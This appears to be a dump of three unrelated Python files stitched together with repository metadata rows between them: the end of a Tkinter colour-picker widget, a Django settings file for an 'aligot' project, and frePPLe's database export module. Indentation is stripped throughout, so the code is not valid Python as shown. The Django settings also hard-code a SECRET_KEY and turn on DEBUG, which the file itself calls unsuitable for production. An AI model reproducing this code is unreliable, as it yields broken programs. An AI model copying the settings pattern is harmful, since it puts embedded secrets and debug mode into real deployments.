cl_mask = zeros( (bw, bw), dtype=uint8)
for x in arange( int(ri), int(bw) ):
h = a/(3*ro)*(bw-x)
for y in arange( int(round(0.5*bw-h)), int(round(0.5*bw+h)) ):
cl_mask[y,x] = 255
self.cl_mask = cl_mask
# Create c-l-triangle ## SLOW ##
##cl_data = zeros( (bw, bw, 4), dtype=uint8)
##for x in arange( ri, bw ):
## h = a/(3*ro)*(bw-x)
## for y in arange( round(0.5*bw-h), round(0.5*bw+h) ):
## cl_data[y,x] = r_[ self.hue_data[255*(1.-self.hue)], 255 ]
# Significantly faster, but somewhat cryptic
rgb = array(hls_to_rgb(self.hue,0.5,1))
# Create sat axis for given hue
##for si in range(256): sat[si,256] = (rgb-1)*si/256.+1
sat = (full((bw-ri,3), rgb )-1) * tile( arange(bw-ri)[:,newaxis], (1,3))/(1.*(bw-ri)) + 1
# Create sat-val plane from sat axis
##for vi in range(256): fd1[:,vi] = fd1[:,256] *vi/256.
sv = transpose( tile(sat[:,newaxis], (a,1) ), (1,0,2) )* ( repeat(arange(a)[::-1],(bw-ri)*3).reshape(a,(bw-ri),3)/(1.*a) )
cl_data = empty( (bw, bw, 4), dtype=uint8)
cl_data[ir(0.5*(bw-a)):ir(0.5*(bw+a)),ri:bw,0:3] = (255*sv).astype(uint8)
cl_data[:,:,3] = self.cl_mask
cl_img = PIL.Image.frombuffer('RGBA', (bw,bw), cl_data, 'raw', 'RGBA', 0, 1)
# Rotate c-l-triangle
cl_img = cl_img.rotate(self.hue*360)
if (self.cl_img==None):
self.cl_img = PIL.ImageTk.PhotoImage( cl_img )
self.canvas.create_image( int(0.5*(W-bw)), int(0.5*(H-bw)), anchor=tk.NW, image=self.cl_img, tag='cl_img' )
self.canvas.tag_bind('cl_img', '<Button-1>', self.foo_cl)
else:
self.cl_img.paste(cl_img)
def foo_cl(self, event):
print 'Fooo cl'
def on_hue_click(self, event):
x = clip( event.x, 0, self.hue_panel_size[0] )
y = clip( event.y, 0, self.hue_panel_size[1] )
print 'x,y =', x, y
xm,ym = self.hue_panel_size[0]/2., self.hue_panel_size[1]/2.
r = sqrt( (x-xm)**2 + (y-ym)**2 )
if r < self.r0: return
phi = -arctan2(y-ym, x-xm)
self.hue = phi/(2*pi)
if self.hue<0: self.hue += 1
if self.hue==-0.0: self.hue = 0.0
print "hue=", self.hue
self.draw()
self.broadcast_color()
def on_tab_changed(self, event):
print 'H(CL) tab'
self.draw()
self.broadcast_color()
def broadcast_color(self):
if self.colorbc:
rgb = hsv_to_rgb(self.hue, self.sat, self.val)
var = ( ('H',self.hue), ('S',self.sat), ('V',self.val) )
self.colorbc.set( rgb, var )
def receive_color(self):
if self.colorbc:
r,g,b = self.colorbc.get_rgb()
else: r,g,b = 0,0,0
self.hue, self.sat, self.val = rgb_to_hsv(r,g,b)
| mit | 7,908,502,349,392,331,000 | 36.881356 | 130 | 0.489933 | false | 2.936925 | false | false | false |
aligot-project/aligot | aligot/settings.py | 2 | 2431 |
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ldxl71%#nruwupjnjy&=&9hjyg2o--gavcsx5!*)rwoq08&=9$'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'aligot',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'aligot.urls'
WSGI_APPLICATION = 'aligot.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': os.getenv('DB_ENGINE', 'django.db.backends.sqlite3'),
'NAME': os.getenv('DB_NAME', os.path.join(BASE_DIR, 'db.sqlite3')),
'USER': os.getenv('DB_USER', ''),
'PASSWORD': os.getenv('DB_PASSWORD', ''),
'HOST': os.getenv('DB_HOST', ''),
'PORT': os.getenv('DB_PORT', ''),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
'/var/www/static/',
)
# Auth
AUTH_USER_MODEL = 'aligot.User'
# rest_framework
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
),
'TEST_REQUEST_DEFAULT_FORMAT': 'json'
}
| mit | -2,162,574,461,606,079,000 | 22.833333 | 75 | 0.684903 | false | 3.263087 | false | false | false |
frePPLe/frePPLe | freppledb/input/commands/export.py | 1 | 54190 | #
# Copyright (C) 2020 by frePPLe bv
#
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero
# General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from datetime import datetime
import logging
from psycopg2.extras import execute_batch
from django.db import DEFAULT_DB_ALIAS, connections
from freppledb.boot import getAttributes
from freppledb.common.commands import PlanTaskRegistry, PlanTask
from freppledb.input.models import (
Buffer,
Calendar,
CalendarBucket,
Customer,
Demand,
Item,
ItemSupplier,
ItemDistribution,
Location,
Operation,
OperationMaterial,
OperationResource,
Resource,
ResourceSkill,
SetupMatrix,
SetupRule,
Skill,
Supplier,
)
logger = logging.getLogger(__name__)
# Default effectivity dates
default_start = datetime(1971, 1, 1)
default_end = datetime(2030, 12, 31)
map_search = {0: "PRIORITY", 1: "MINCOST", 2: "MINPENALTY", 3: "MINCOSTPENALTY"}
def SQL4attributes(attrs, with_on_conflict=True):
""" Snippet is used many times in this file"""
if with_on_conflict:
return (
"".join([",%s" % i for i in attrs]),
",%s" * len(attrs),
"".join([",\n%s=excluded.%s" % (i, i) for i in attrs]),
)
else:
return ("".join([",%s" % i for i in attrs]), ",%s" * len(attrs))
@PlanTaskRegistry.register
class cleanStatic(PlanTask):
description = "Clean static data"
sequence = 300
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
if kwargs.get("exportstatic", False) and kwargs.get("source", None):
return 1
else:
return -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
source = kwargs.get("source", None)
with connections[database].cursor() as cursor:
cursor.execute(
"""
delete from operationmaterial
where (source = %s and lastmodified <> %s)
or operation_id in (
select name from operation
where operation.source = %s and operation.lastmodified <> %s
)
""",
(source, cls.timestamp, source, cls.timestamp),
)
cursor.execute(
"delete from buffer where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from operationplan where demand_id in (select name from demand where source = %s and lastmodified <> %s)",
(source, cls.timestamp),
)
cursor.execute(
"delete from demand where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from itemsupplier where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from itemdistribution where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"""
delete from operationplan
where owner_id is not null and ((source = %s and lastmodified <> %s)
or operation_id in (
select name from operation
where operation.source = %s and operation.lastmodified <> %s
)
or supplier_id in (
select name from supplier where source = %s and lastmodified <> %s
))
""",
(source, cls.timestamp, source, cls.timestamp, source, cls.timestamp),
)
cursor.execute(
"""
delete from operationplan
where (source = %s and lastmodified <> %s)
or operation_id in (
select name from operation
where operation.source = %s and operation.lastmodified <> %s
)
or supplier_id in (
select name from supplier where source = %s and lastmodified <> %s
)
""",
(source, cls.timestamp, source, cls.timestamp, source, cls.timestamp),
)
cursor.execute(
"""
delete from operationresource
where (source = %s and lastmodified <> %s)
or operation_id in (
select name from operation
where operation.source = %s and operation.lastmodified <> %s
)
""",
(source, cls.timestamp, source, cls.timestamp),
)
cursor.execute(
"delete from operation where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from item where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from resourceskill where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from operation where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from resource where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from location where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from calendarbucket where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from calendar where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from skill where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from setuprule where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from setupmatrix where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from customer where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
cursor.execute(
"delete from supplier where source = %s and lastmodified <> %s",
(source, cls.timestamp),
)
@PlanTaskRegistry.register
class exportParameters(PlanTask):
description = ("Export static data", "Export parameters")
sequence = (301, "exportstatic1", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
# Only complete export should save the current date
if kwargs.get("exportstatic", False) and not kwargs.get("source", None):
return 1
else:
return -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
with connections[database].cursor() as cursor:
# Update current date if the parameter already exists
# If it doesn't exist, we want to continue using the system clock for the next run.
cursor.execute(
"update common_parameter set value=%s, lastmodified=%s where name='currentdate'",
(frepple.settings.current.strftime("%Y-%m-%d %H:%M:%S"), cls.timestamp),
)
@PlanTaskRegistry.register
class exportCalendars(PlanTask):
description = ("Export static data", "Export calendars")
sequence = (301, "exportstatic2", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Calendar)]
def getData():
for i in frepple.calendars():
if (
i.hidden
or i.source == "common_bucket"
or (source and source != i.source)
):
continue
r = [i.name, round(i.default, 8), i.source, cls.timestamp]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into calendar
(name,defaultvalue,source,lastmodified%s)
values(%%s,%%s,%%s,%%s%s)
on conflict (name)
do update set
defaultvalue=excluded.defaultvalue,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportLocations(PlanTask):
description = ("Export static data", "Export locations")
sequence = (302, "exportstatic1", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Location)]
def getData():
for i in frepple.locations():
if source and source != i.source:
continue
r = [
i.name,
i.description,
i.available and i.available.name or None,
i.category,
i.subcategory,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.locations():
if i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into location
(name,description,available_id,category,subcategory,source,lastmodified,owner_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
available_id=excluded.available_id,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update location set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportItems(PlanTask):
description = ("Export static data", "Export items")
sequence = (302, "exportstatic2", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Item)]
def getData():
for i in frepple.items():
if source and source != i.source:
continue
r = [
i.name,
i.description,
round(i.cost, 8),
i.category,
i.subcategory,
"make to order"
if isinstance(i, frepple.item_mto)
else "make to stock",
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.items():
if i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into item
(name,description,cost,category,subcategory,type,source,lastmodified,owner_id%s)
values (%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
cost=excluded.cost,
category=excluded.category,
subcategory=excluded.subcategory,
type=excluded.type,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update item set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportOperations(PlanTask):
description = ("Export static data", "Export operations")
sequence = (303, "exportstatic1", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Operation)]
def getData():
for i in frepple.operations():
if (
i.hidden
or (source and source != i.source)
or isinstance(
i,
(
frepple.operation_itemsupplier,
frepple.operation_itemdistribution,
),
)
):
continue
r = [
i.name,
i.fence,
i.posttime,
round(i.size_minimum, 8),
round(i.size_multiple, 8),
i.size_maximum < 9999999999999 and round(i.size_maximum, 8) or None,
i.__class__.__name__[10:],
i.duration
if isinstance(
i, (frepple.operation_fixed_time, frepple.operation_time_per)
)
else None,
i.duration_per
if isinstance(i, frepple.operation_time_per)
else None,
i.location and i.location.name or None,
round(i.cost, 8),
map_search[i.search],
i.description,
i.category,
i.subcategory,
i.source,
i.item.name if i.item else None,
i.priority if i.priority != 1 else None,
i.effective_start if i.effective_start != default_start else None,
i.effective_end if i.effective_end != default_end else None,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.operations():
if (
i.owner
and not i.hidden
and not i.owner.hidden
and (not source or source == i.source)
and not isinstance(
i,
(
frepple.operation_itemsupplier,
frepple.operation_itemdistribution,
),
)
):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into operation
(name,fence,posttime,sizeminimum,sizemultiple,sizemaximum,type,
duration,duration_per,location_id,cost,search,description,category,
subcategory,source,item_id,priority,effective_start,effective_end,
lastmodified,owner_id%s)
values(%%s,%%s * interval '1 second',%%s * interval '1 second',%%s,%%s,
%%s,%%s,%%s * interval '1 second',%%s * interval '1 second',%%s,%%s,%%s,
%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
fence=excluded.fence,
posttime=excluded.posttime,
sizeminimum=excluded.sizeminimum,
sizemultiple=excluded.sizemultiple,
sizemaximum=excluded.sizemaximum,
type=excluded.type,
duration=excluded.duration,
duration_per=excluded.duration_per,
location_id=excluded.location_id,
cost=excluded.cost,
search=excluded.search,
description=excluded.description,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
item_id=excluded.item_id,
priority=excluded.priority,
effective_start=excluded.effective_start,
effective_end=excluded.effective_end,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update operation set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportSetupMatrices(PlanTask):
description = ("Export static data", "Export setup matrices")
sequence = (303, "exportstatic2", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(SetupMatrix)]
def getData():
for i in frepple.setupmatrices():
if source and source != i.source:
continue
r = [i.name, i.source, cls.timestamp]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into setupmatrix
(name,source,lastmodified%s)
values(%%s,%%s,%%s%s)
on conflict (name)
do update set
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportResources(PlanTask):
description = ("Export static data", "Export resources")
sequence = 304
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Resource)]
def getData():
for i in frepple.resources():
if i.hidden or (source and source != i.source):
continue
r = [
i.name,
i.description,
i.maximum,
i.maximum_calendar.name if i.maximum_calendar else None,
i.location and i.location.name or None,
i.__class__.__name__[9:],
round(i.cost, 8),
i.maxearly,
i.setup,
i.setupmatrix.name if i.setupmatrix else None,
i.category,
i.subcategory,
i.efficiency,
i.efficiency_calendar.name if i.efficiency_calendar else None,
i.available.name if i.available else None,
i.constrained,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.resources():
if not i.hidden and i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into resource
(name,description,maximum,maximum_calendar_id,location_id,type,cost,
maxearly,setup,setupmatrix_id,category,subcategory,efficiency,
efficiency_calendar_id,available_id,constrained,source,lastmodified,owner_id%s)
values(
%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s,
%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
maximum=excluded.maximum,
maximum_calendar_id=excluded.maximum_calendar_id,
location_id=excluded.location_id,
type=excluded.type,
cost=excluded.cost,
maxearly=excluded.maxearly,
setup=excluded.setup,
setupmatrix_id=excluded.setupmatrix_id,
category=excluded.category,
subcategory=excluded.subcategory,
efficiency=excluded.efficiency,
efficiency_calendar_id=excluded.efficiency_calendar_id,
available_id=excluded.available_id,
constrained=excluded.constrained,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update resource set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportSetupRules(PlanTask):
description = ("Export static data", "Export setup matrix rules")
sequence = (305, "exportstatic1", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(SetupRule)]
def getData():
for m in frepple.setupmatrices():
for i in m.rules:
if source and source != i.source:
continue
r = [
m.name,
i.priority,
i.fromsetup,
i.tosetup,
i.duration,
round(i.cost, 8),
i.resource.name if i.resource else None,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into setuprule
(setupmatrix_id,priority,fromsetup,tosetup,duration,cost,resource_id,source,lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s%s)
on conflict (setupmatrix_id, priority)
do update set
fromsetup=excluded.fromsetup,
tosetup=excluded.tosetup,
duration=excluded.duration,
cost=excluded.cost,
resource_id=excluded.resource_id,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportSkills(PlanTask):
description = ("Export static data", "Export skills")
sequence = (305, "exportstatic1", 2)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Skill)]
def getData():
for i in frepple.skills():
if source and source != i.source:
continue
r = [i.name, i.source, cls.timestamp]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""insert into skill
(name,source,lastmodified%s)
values(%%s,%%s,%%s%s)
on conflict (name)
do update set
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportResourceSkills(PlanTask):
description = ("Export static data", "Export resource skills")
sequence = (305, "exportstatic1", 3)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(ResourceSkill)]
def getData():
for s in frepple.skills():
for i in s.resourceskills:
if source and source != i.source:
continue
r = [
i.effective_start
if i.effective_start != default_start
else None,
i.effective_end if i.effective_end != default_end else None,
i.priority,
i.source,
cls.timestamp,
i.resource.name,
s.name,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into resourceskill
(effective_start,effective_end,priority,source,lastmodified,resource_id,skill_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (resource_id, skill_id)
do update set
effective_start=excluded.effective_start,
effective_end=excluded.effective_end,
priority=excluded.priority,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportOperationResources(PlanTask):
description = ("Export static data", "Export operation resources")
sequence = (305, "exportstatic1", 4)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(OperationResource)]
def getData():
for o in frepple.operations():
if o.hidden:
continue
for i in o.loads:
if i.hidden or (source and source != i.source):
continue
r = [
i.operation.name,
i.resource.name,
i.effective_start
if i.effective_start != default_start
else None,
i.effective_end if i.effective_end != default_end else None,
round(i.quantity, 8),
i.setup,
i.name,
i.priority,
map_search[i.search]
if map_search[i.search] != "PRIORITY"
else None,
i.source,
i.skill.name if i.skill else None,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into operationresource
(operation_id,resource_id,effective_start,effective_end,
quantity,setup,name,priority,search,source,skill_id,lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
on conflict (operation_id, resource_id, effective_start)
do update set
effective_end=excluded.effective_end,
quantity=excluded.quantity,
setup=excluded.setup,
name=excluded.name,
priority=excluded.priority,
search=excluded.search,
skill_id=excluded.skill_id,
source=excluded.source,
lastmodified=excluded.lastmodified
%s
"""
% SQL4attributes(attrs),
getData(),
)
@PlanTaskRegistry.register
class exportCustomers(PlanTask):
description = ("Export static data", "Export customers")
sequence = (305, "exportstatic2", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Customer)]
def getData():
for i in frepple.customers():
if source and source != i.source:
continue
r = [
i.name,
i.description,
i.category,
i.subcategory,
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.customers():
if i.owner and (not source or source == i.source):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into customer
(name,description,category,subcategory,source,lastmodified,owner_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
description=excluded.description,
category=excluded.category,
subcategory=excluded.subcategory,
source=excluded.source,
lastmodified=excluded.lastmodified,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update customer set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportDemands(PlanTask):
description = ("Export static data", "Export sales orders")
sequence = (305, "exportstatic2", 2)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(Demand)]
def getData():
for i in frepple.demands():
if (
not isinstance(i, frepple.demand_default)
or i.hidden
or (source and source != i.source)
):
continue
r = [
i.name,
i.due,
round(i.quantity, 8),
i.priority,
i.item.name,
i.location.name if i.location else None,
i.operation.name
if i.operation and not i.operation.hidden
else None,
i.customer.name if i.customer else None,
round(i.minshipment, 8),
i.maxlateness,
i.category,
i.subcategory,
i.source,
i.description,
cls.timestamp,
i.status,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
def getOwners():
for i in frepple.demands():
if (
i.owner
and isinstance(i, frepple.demand_default)
and not i.hidden
and (not source or source == i.source)
):
yield (i.owner.name, i.name)
with connections[database].cursor() as cursor:
execute_batch(
cursor,
"""
insert into demand
(name,due,quantity,priority,item_id,location_id,operation_id,customer_id,
minshipment,maxlateness,category,subcategory,source,description,lastmodified,
status,owner_id%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s * interval '1 second',%%s,%%s,%%s,%%s,%%s,%%s,null%s)
on conflict (name)
do update set
due=excluded.due,
quantity=excluded.quantity,
priority=excluded.priority,
item_id=excluded.item_id,
location_id=excluded.location_id,
operation_id=excluded.operation_id,
customer_id=excluded.customer_id,
minshipment=excluded.minshipment,
maxlateness=excluded.maxlateness,
category=excluded.category,
description=excluded.description,
source=excluded.source,
lastmodified=excluded.lastmodified,
status=excluded.status,
owner_id=excluded.owner_id
%s
"""
% SQL4attributes(attrs),
getData(),
)
execute_batch(
cursor, "update demand set owner_id=%s where name=%s", getOwners()
)
@PlanTaskRegistry.register
class exportCalendarBuckets(PlanTask):
description = ("Export static data", "Export calendar buckets")
sequence = (305, "exportstatic3", 1)
@classmethod
def getWeight(cls, database=DEFAULT_DB_ALIAS, **kwargs):
return 1 if kwargs.get("exportstatic", False) else -1
@classmethod
def run(cls, database=DEFAULT_DB_ALIAS, **kwargs):
import frepple
source = kwargs.get("source", None)
attrs = [f[0] for f in getAttributes(CalendarBucket)]
def int_to_time(i):
hour = i // 3600
i -= hour * 3600
minute = i // 60
i -= minute * 60
second = i
if hour >= 24:
hour -= 24
return "%s:%s:%s" % (hour, minute, second)
def getData(cursor):
cursor.execute("SELECT max(id) FROM calendarbucket")
cnt = cursor.fetchone()[0] or 1
for c in frepple.calendars():
if (
c.hidden
or c.source == "common_bucket"
or (source and source != c.source)
):
continue
for i in c.buckets:
cnt += 1
r = [
c.name,
i.start if i.start != default_start else None,
i.end if i.end != default_end else None,
cnt,
i.priority,
round(i.value, 8),
True if (i.days & 1) else False,
True if (i.days & 2) else False,
True if (i.days & 4) else False,
True if (i.days & 8) else False,
True if (i.days & 16) else False,
True if (i.days & 32) else False,
True if (i.days & 64) else False,
int_to_time(i.starttime),
int_to_time(i.endtime - 1),
i.source,
cls.timestamp,
]
for a in attrs:
r.append(getattr(i, a, None))
yield r
with connections[database].cursor() as cursor:
if source:
cursor.execute("delete from calendarbucket where source = %s", [source])
else:
cursor.execute("delete from calendarbucket")
execute_batch(
cursor,
"""
insert into calendarbucket
(calendar_id,startdate,enddate,id,priority,value,
sunday,monday,tuesday,wednesday,thursday,friday,saturday,
starttime,endtime,source,lastmodified%s)
values(%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s,%%s%s)
"""
% SQL4attributes(attrs, with_on_conflict=False),
getData(cursor),
)
